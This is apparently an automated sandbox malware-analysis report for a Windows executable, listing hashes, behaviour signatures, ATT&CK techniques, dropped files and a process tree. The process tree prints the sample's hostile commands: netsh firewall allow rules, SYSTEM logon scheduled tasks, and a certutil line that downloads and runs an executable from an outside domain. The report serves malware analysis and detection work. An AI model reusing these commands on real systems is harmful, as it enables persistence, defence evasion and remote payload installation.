Overview

overview

10

Static

static

ae1ab0e636...82.exe

windows7_x64

10

ae1ab0e636...82.exe

windows10-2004_x64

8

Analysis

  • max time kernel
    6s
  • max time network
    77s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-05-2022 21:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe

  • Size

    3.8MB

  • MD5

    faded794f263120377f79cc3cf35e11d

  • SHA1

    4add6c66e14478dbd953e05e0bce6844a702618f

  • SHA256

    ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982

  • SHA512

    b41885525518325a0f82753ea340cc7118ae32c8aba57ecce9136571e4fed7f2c4bca09ef990685413c03d9d920635194b2e0145e07d181541a3bc0bdb76c7b4

Score
8/10
evasion

Malware Config

Signatures

  • Modifies Windows Firewall 1 TTPs
    evasion
  • Modifies boot configuration data using bcdedit 1 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
    "C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"
    1⤵
      PID:2280
      • C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe
        "C:\Users\Admin\AppData\Local\Temp\ae1ab0e63697f9c1b48d6e33e51f39ea63b7ad40a9ae35bb9adcf98678f82982.exe"
        2⤵
          PID:2040
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
            3⤵
              PID:4216
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
                4⤵
                  PID:2132
              • C:\Windows\system32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                3⤵
                  PID:876
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe ""
                  3⤵
                    PID:1852
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                      4⤵
                      • Creates scheduled task(s)
                      PID:2836
                    • C:\Windows\SYSTEM32\schtasks.exe
                      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                      4⤵
                      • Creates scheduled task(s)
                      PID:3404
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\Sysnative\bcdedit.exe /v
                      4⤵
                      • Modifies boot configuration data using bcdedit
                      PID:3476
                    • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                      4⤵
                        PID:2352
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2040 -s 740
                      3⤵
                      • Program crash
                      PID:424
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 620
                    2⤵
                    • Program crash
                    PID:2576
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                  1⤵
                    PID:1924
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2280 -ip 2280
                    1⤵
                      PID:4228
                    • C:\Windows\system32\netsh.exe
                      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                      1⤵
                        PID:2980
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2040 -ip 2040
                        1⤵
                          PID:1208

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Initial Access

                        Execution

                        Scheduled Task

                        1
                        T1053

                        Persistence

                        Modify Existing Service

                        1
                        T1031

                        Scheduled Task

                        1
                        T1053

                        Privilege Escalation

                        Scheduled Task

                        1
                        T1053

                        Defense Evasion

                        Credential Access

                        Discovery

                        Lateral Movement

                        Collection

                        Exfiltration

                        Command and Control

                        Impact

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                          Filesize

                          272KB

                          MD5

                          c4b96699047584583dbc95cc86788b0a

                          SHA1

                          c64e88cc4d16723349deff660563def488a735c8

                          SHA256

                          df6086d28af0d44baceb69a81b6a037932c5b779495f99573bc7c8797d43bd34

                          SHA512

                          f6b11dcdcba9ed678ca2db3bfa649f8db44896b387da720562c2c16dfb30c1b0d7a3d235a50f23d65bf48dfd00d1773a6a2125af6d029020dbcb38d1c8d9baa6

                          Download Submit
                        • C:\Windows\rss\csrss.exe
                          Filesize

                          399KB

                          MD5

                          794f5c41d565d7e50eb863cf1c059c54

                          SHA1

                          3d3c8db7e91625fdf656442984d1b55a71d83f5b

                          SHA256

                          f8af516ec0e0d64381bf7cb2b8d3d8cee910c4b2c42ce0f4920b94377f728f5d

                          SHA512

                          60f49a884b5948b596222552cfc16ddac118ec4e2c732e856728ff80ffa34a289a536cffd26957d5835d1bcf301cca415ae258e018aa3534de30ec36888bf203

                          Download Submit
                        • C:\Windows\rss\csrss.exe
                          Filesize

                          253KB

                          MD5

                          a3c8e6a1e954fdf0014aee5d896a0655

                          SHA1

                          366d412275b7fa117eff7f76c5bbe045417e2be1

                          SHA256

                          c782d874a603c001d1bb28913d33f8db846d4395a847f13e7763af47417a62e8

                          SHA512

                          1620603f9d0972bbdf1bbfb609ca38b3b9ec5691746678501385396d2ff3e1edb174fe47084107a663e8958dc46c54c3993d1c7723080b85d10c1b277431a8ef

                          Download Submit
                        • memory/876-138-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1852-145-0x0000000000400000-0x0000000000BFB000-memory.dmp
                          Filesize

                          8.0MB

                          Download
                        • memory/1852-140-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1852-144-0x0000000001800000-0x0000000001EF5000-memory.dmp
                          Filesize

                          7.0MB

                          Download
                        • memory/1852-143-0x0000000001400000-0x00000000017A6000-memory.dmp
                          Filesize

                          3.6MB

                          Download
                        • memory/2040-134-0x0000000000EF1000-0x0000000001297000-memory.dmp
                          Filesize

                          3.6MB

                          Download
                        • memory/2040-135-0x0000000000400000-0x0000000000BFB000-memory.dmp
                          Filesize

                          8.0MB

                          Download
                        • memory/2040-133-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2132-137-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2280-132-0x0000000000400000-0x0000000000BFB000-memory.dmp
                          Filesize

                          8.0MB

                          Download
                        • memory/2280-130-0x0000000000E6C000-0x0000000001212000-memory.dmp
                          Filesize

                          3.6MB

                          Download
                        • memory/2280-131-0x0000000001220000-0x0000000001915000-memory.dmp
                          Filesize

                          7.0MB

                          Download
                        • memory/2352-148-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2836-147-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2980-139-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3404-146-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3476-150-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4216-136-0x0000000000000000-mapping.dmp
                          Download